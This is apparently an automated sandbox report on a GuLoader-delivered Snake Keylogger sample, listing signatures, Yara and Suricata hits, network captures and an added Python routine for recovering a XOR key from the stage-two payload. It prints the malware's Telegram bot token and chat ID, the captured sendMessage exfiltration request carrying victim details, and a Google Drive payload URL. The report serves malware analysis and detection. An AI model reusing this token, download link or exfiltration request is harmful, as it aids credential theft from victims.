Windows Analysis Report
OeM750ajqm.exe

Overview

General Information

Sample name: OeM750ajqm.exe (renamed because the original name is a hash value)
Original sample name: d8dd9ac3ec0436e700aa87ac846c7d682389acbbda1818b56c42bec2e21ece73.exe
Analysis ID: 1631812
MD5: a348c76d9e0d8e41a5be07235738c114
SHA1: e7647f2f0f0bbd73dd3d6e024810f41c6c24a9fc
SHA256: d8dd9ac3ec0436e700aa87ac846c7d682389acbbda1818b56c42bec2e21ece73
Tags: exe, user-adrian__luca

Detection

GuLoader, Snake Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • OeM750ajqm.exe (PID: 1204 cmdline: "C:\Users\user\Desktop\OeM750ajqm.exe" MD5: A348C76D9E0D8E41A5BE07235738C114)
    • OeM750ajqm.exe (PID: 4940 cmdline: "C:\Users\user\Desktop\OeM750ajqm.exe" MD5: A348C76D9E0D8E41A5BE07235738C114)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
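Malpedia's note above that the GuLoader-downloaded payload is XORed points at the first step an analyst takes once the stage-2 blob has been carved from the capture or from memory: recover the key and confirm the result is a PE. The Python below is an added example, not part of this Joe Sandbox report and not GuLoader's own decoder. It assumes a repeating-key XOR (the page does not state the real key length or scheme, so this is a simplification), recovers the key by known-plaintext against the DOS stub string that standard linkers put in every PE, and validates the candidate by checking the MZ and PE signatures. The PE-shaped input and the 5-byte key are constructed inside the block for the demo, not taken from the sample.

```python
import struct

# Known plaintext present in virtually every PE produced by a standard linker.
DOS_STUB = b"This program cannot be run in DOS mode."


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Cheap structural check: 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (offset 0x3c)."""
    if len(data) < 64 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed PE-shaped blob for the demo (not a runnable executable and not
    the sample): DOS header, a real-looking DOS stub, a PE signature, filler."""
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            + DOS_STUB + b"\r\r\n$\x00")
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64 + len(stub))  # e_lfanew
    nt_headers = b"PE\x00\x00" + struct.pack("<H", 0x014C) + b"\x00" * 18  # Machine = i386
    return dos_header + stub + nt_headers + bytes(range(256)) * 2


def recover_xor_key(cipher: bytes, max_key_len: int = 32, known: bytes = DOS_STUB):
    """Slide the known plaintext over the ciphertext. At each offset derive the
    keystream, keep only key lengths for which that keystream is periodic, rotate
    the key so it is aligned to offset 0, and accept the first candidate whose
    output passes looks_like_pe(). Returns None when no repeating key up to
    max_key_len fits (different scheme, or key longer than the known plaintext)."""
    for off in range(len(cipher) - len(known) + 1):
        stream = bytes(c ^ p for c, p in zip(cipher[off:off + len(known)], known))
        for klen in range(1, min(max_key_len, len(known)) + 1):
            if any(stream[j] != stream[j + klen] for j in range(len(known) - klen)):
                continue
            key = bytearray(klen)
            for j in range(klen):
                key[(off + j) % klen] = stream[j]
            if looks_like_pe(xor_bytes(cipher, bytes(key))):
                return bytes(key)
    return None


def demo() -> bytes:
    """Encrypt the constructed PE with an assumed 5-byte key and recover it."""
    key = bytes.fromhex("5a13c7882d")  # assumed demo key, not from the sample
    cipher = xor_bytes(build_fake_pe(), key)
    recovered = recover_xor_key(cipher)
    print("recovered key:", recovered.hex() if recovered else None)
    return recovered


if __name__ == "__main__":
    demo()
```

Two things to carry over to a real blob: run the search on the raw bytes the loader fetched (the Google Drive response body in this capture) and, if no repeating key fits, the scheme is not plain repeating-key XOR and the key schedule has to be lifted from the loader's shellcode instead.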
{"Exfil Mode": "Telegram", "Token": "7850428832:AAHkmxGiQMqPdI63Wmec7SES132JcWja6Js", "Chat_id": "7902102156", "Version": "4.4"}
Source | Rule | Description | Author
00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.1450395666.000000000731A000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: OeM750ajqm.exe PID: 4940 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
            No Sigma rule has matched
Suricata IDS alerts (timestamp, SID, severity, classtype, source -> destination, protocol):
2025-03-07T16:15:46.397617+0100  2803305  severity 3  Unknown Traffic  192.168.2.4:49724 -> 104.21.80.1:443  TCP
2025-03-07T16:15:49.803561+0100  2803305  severity 3  Unknown Traffic  192.168.2.4:49726 -> 104.21.80.1:443  TCP
2025-03-07T16:15:56.697503+0100  2803305  severity 3  Unknown Traffic  192.168.2.4:49730 -> 104.21.80.1:443  TCP
2025-03-07T16:16:00.187837+0100  2803305  severity 3  Unknown Traffic  192.168.2.4:49732 -> 104.21.80.1:443  TCP
2025-03-07T16:16:06.746218+0100  2803305  severity 3  Unknown Traffic  192.168.2.4:49736 -> 104.21.80.1:443  TCP
2025-03-07T16:15:39.972761+0100  2803274  severity 2  Potentially Bad Traffic  192.168.2.4:49722 -> 193.122.6.168:80  TCP
2025-03-07T16:15:43.410275+0100  2803274  severity 2  Potentially Bad Traffic  192.168.2.4:49722 -> 193.122.6.168:80  TCP
2025-03-07T16:15:47.160324+0100  2803274  severity 2  Potentially Bad Traffic  192.168.2.4:49725 -> 193.122.6.168:80  TCP
2025-03-07T16:15:32.774570+0100  2803270  severity 2  Potentially Bad Traffic  192.168.2.4:49720 -> 142.250.185.238:443  TCP
2025-03-07T16:16:14.293486+0100  1810007  severity 1  Potentially Bad Traffic  192.168.2.4:49739 -> 149.154.167.220:443  TCP


            AV Detection

Source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7850428832:AAHkmxGiQMqPdI63Wmec7SES132JcWja6Js", "Chat_id": "7902102156", "Version": "4.4"}
Source: OeM750ajqm.exe, VirusTotal: Detection: 58%
Source: OeM750ajqm.exe, ReversingLabs: Detection: 39%
Source: Submitted sample, Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_065F87A8 CryptUnprotectData, 4_2_065F87A8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_065F8EF1 CryptUnprotectData, 4_2_065F8EF1
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_065F87D1 CryptUnprotectData, 4_2_065F87D1
Source: OeM750ajqm.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49730 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: OeM750ajqm.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 3_2_00406751 FindFirstFileA,FindClose, 3_2_00406751
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 3_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 3_2_00405B80
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 3_2_004027CF FindFirstFileA, 3_2_004027CF
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_00406751 FindFirstFileA,FindClose, 4_2_00406751
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_004027CF FindFirstFileA, 4_2_004027CF
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405B80
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0652F45Dh, 4_2_0652F2C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0652F45Dh, 4_2_0652F4AC
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0652FC19h, 4_2_0652F961
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F7EB5h, 4_2_065F7B78
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F25A9h, 4_2_065F2300
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F9280h, 4_2_065F8FB0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FA3AFh, 4_2_065FA0E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F1CF9h, 4_2_065F1A50
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F4D21h, 4_2_065F4A78
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F7119h, 4_2_065F6E70
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FF13Fh, 4_2_065FEE70
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F6CC1h, 4_2_065F6A18
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FACCFh, 4_2_065FAA00
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F48C9h, 4_2_065F4620
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F5179h, 4_2_065F4ED0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F7571h, 4_2_065F72C8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FB15Fh, 4_2_065FAE90
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FD14Fh, 4_2_065FCE80
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F2151h, 4_2_065F1EA8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F2A01h, 4_2_065F2758
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FD5DFh, 4_2_065FD310
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FF5CFh, 4_2_065FF300
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F55D1h, 4_2_065F5328
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F79C9h, 4_2_065F7720
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FB5EFh, 4_2_065FB320
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F5E81h, 4_2_065F5BD8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F9A8Fh, 4_2_065F97C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FFA5Fh, 4_2_065FF790
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F5A29h, 4_2_065F5780
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F2E59h, 4_2_065F2BB0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FBA7Fh, 4_2_065FB7B0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FDA6Fh, 4_2_065FD7A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F9F1Fh, 4_2_065F9C50
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F02E9h, 4_2_065F0040
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FBF0Fh, 4_2_065FBC40
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F3709h, 4_2_065F3460
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F32B1h, 4_2_065F3008
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F62D9h, 4_2_065F6030
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FDEFFh, 4_2_065FDC30
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FC39Fh, 4_2_065FC0D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FE38Fh, 4_2_065FE0C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F0B99h, 4_2_065F08F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F0741h, 4_2_065F0498
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F6733h, 4_2_065F6488
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FE81Fh, 4_2_065FE550
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F0FF1h, 4_2_065F0D48
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FA83Fh, 4_2_065FA570
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FC82Fh, 4_2_065FC560
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F18A1h, 4_2_065F15F8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FCCBFh, 4_2_065FC9F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065FECAFh, 4_2_065FE9E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 065F1449h, 4_2_065F11A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06633E27h, 4_2_06633B58
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06634E18h, 4_2_06634B20
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06637458h, 4_2_06637160
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06631E37h, 4_2_06631B68
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06639F60h, 4_2_06639C68
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663CA68h, 4_2_0663C770
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066347E8h, 4_2_06634478
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06635C70h, 4_2_06635978
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663F570h, 4_2_0663F278
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066302E7h, 4_2_06630040
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06636138h, 4_2_06635E40
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663FA38h, 4_2_0663F740
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06631517h, 4_2_06631248
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06638C40h, 4_2_06638948
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663B748h, 4_2_0663B450
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663E250h, 4_2_0663DF58
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663E718h, 4_2_0663E420
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06630BF7h, 4_2_06630928
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06637920h, 4_2_06637628
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663A428h, 4_2_0663A130
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06633507h, 4_2_06633238
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663CF30h, 4_2_0663CC38
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663D3F8h, 4_2_0663D100
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06636600h, 4_2_06636308
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06639108h, 4_2_06638E10
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06632BE7h, 4_2_06632918
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663BC10h, 4_2_0663B918
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663C0D8h, 4_2_0663BDE0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066342B7h, 4_2_06633FE8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066352E0h, 4_2_06634FE8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663EBE1h, 4_2_0663E8E8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06637DE8h, 4_2_06637AF0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066322C7h, 4_2_06631FF8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663A8F0h, 4_2_0663A5F8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663ADB8h, 4_2_0663AAC0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06633997h, 4_2_066336C8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663D8C0h, 4_2_0663D5C8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06636AC8h, 4_2_066367D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066319A7h, 4_2_066316D8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066395D0h, 4_2_066392D8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06639A98h, 4_2_066397A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06633078h, 4_2_06632DA8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663C5A0h, 4_2_0663C2A8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066357A8h, 4_2_066354B0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663F0A8h, 4_2_0663EDB0
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06631087h, 4_2_06630DB8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 066382B0h, 4_2_06637FB8
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06638778h, 4_2_06638480
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06632757h, 4_2_06632488
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663B280h, 4_2_0663AF88
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 0663DD88h, 4_2_0663DA90
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06630767h, 4_2_06630498
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then jmp 06636F90h, 4_2_06636C98
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h], 4_2_0665F228
Source: C:\Users\user\Desktop\OeM750ajqm.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h], 4_2_0665F218

            Networking

Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49739 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:15:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 193.122.6.168
Source: Joe Sandbox View, IP Address: 104.21.80.1
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.6.168:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49722 -> 193.122.6.168:80
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 142.250.185.238:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49724 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
